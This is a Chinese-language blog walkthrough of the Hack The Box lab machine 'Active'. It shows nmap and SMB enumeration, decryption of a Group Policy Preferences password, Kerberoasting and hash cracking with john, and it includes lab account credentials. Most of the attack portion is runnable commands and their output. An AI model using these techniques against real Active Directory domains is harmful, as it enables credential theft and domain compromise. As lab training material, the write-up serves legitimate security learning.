572 words
3 minutes
[HTB] Active Walkthrough
前言
這台是 Hack The Box 的 Active,難度是 Easy 也是 AD Track 的第三台
使用到的技巧:
- Extract password from Group Policy Preferences XML file
- Kerberoasting
Attacker: 10.10.16.6
Target: 10.10.10.100
Recon
- nmap
sudo nmap -sV -sC 10.10.10.100PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-14 00:43:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -5m10s
| smb2-time:
| date: 2024-05-14T00:44:38
|_ start_date: 2024-05-12T14:12:52
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required值得關注的有 domain, kerberos, ldap 以及 smb
- smb
smbclient -N -L \\\\10.10.10.100\\Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disksmbmap -H 10.10.10.100Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESSReplication 有開匿名
smbclient -N -L \\\\10.10.10.100\\Replication翻一下到這個路徑拿到 Groups.xml
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml- ldap
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontextsdn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb嘗試 AS-REP-Roasting
impacket-GetNPUsers active.htb/ -dc-ip 10.10.10.100 -request失敗
Exploit
嘗試用這個工具解出 Groups.xml 密碼
https://github.com/t0thkr1s/gpp-decrypt 
嘗試用 evil-winrm 連上主機
evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18失敗了
smbmap + credential 再列舉一次
smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
再用 smbclient 連上去
smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18到桌面就可以拿到 flag 了
Privilege Escalation
有 kerberos,嘗試一下 Kerberoasting
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
查到這篇
https://github.com/ivanitlearning/CTF-Repos/blob/master/HTB/Sauna/Kerberoasting-HSmith.md
笑死是 AD track 前一台的文
沒想到是跟時間有關
sudo ntpdate 10.10.10.100重送一次就拿到 password hash 了
用 john + rockyou crack
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
smbclient \\\\10.10.10.100\\Users -U Administrator%Ticketmaster1968一樣到桌面就拿到 flag 了
後記
終於完成 Tj Null’s List 的 PWK V1,總共打了 30 個 box,有些評分太低的我就沒打了
當初參加 CODE 的時候隊友用 Metasploit 很帥,結果現在都在學不用 Metasploit 解題 ==
本來是想一天打一台,結果四個月只打了 30 台,話還是不要說太滿。
[HTB] Active Walkthrough
https://flydragonw.github.io/posts/htb_active/